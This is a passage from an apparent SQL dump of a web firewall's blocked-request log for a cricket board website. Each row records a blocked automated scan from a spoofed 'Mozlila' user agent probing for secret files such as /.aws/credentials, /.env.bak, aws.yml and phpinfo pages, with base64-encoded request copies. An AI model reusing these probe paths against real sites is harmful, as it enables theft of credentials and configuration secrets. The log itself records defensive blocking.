Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(874,1629961362.779745,1629961362.700800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(875,1629961361.101157,1629961361.014100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(876,1629960970.420226,1629960970.339500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(877,1629960968.840286,1629960968.713500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(878,1629960967.130383,1629960967.054100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(879,1629960964.940574,1629960964.862800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(880,1629960963.387491,1629960963.305700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(881,1629960961.656401,1629960961.580000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(882,1629960959.851204,1629960959.768700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(883,1629960957.266395,1629960957.189700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(884,1629960955.603990,1629960955.512600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(885,1629960953.471635,1629960953.340600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(886,1629960951.299540,1629960951.212900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 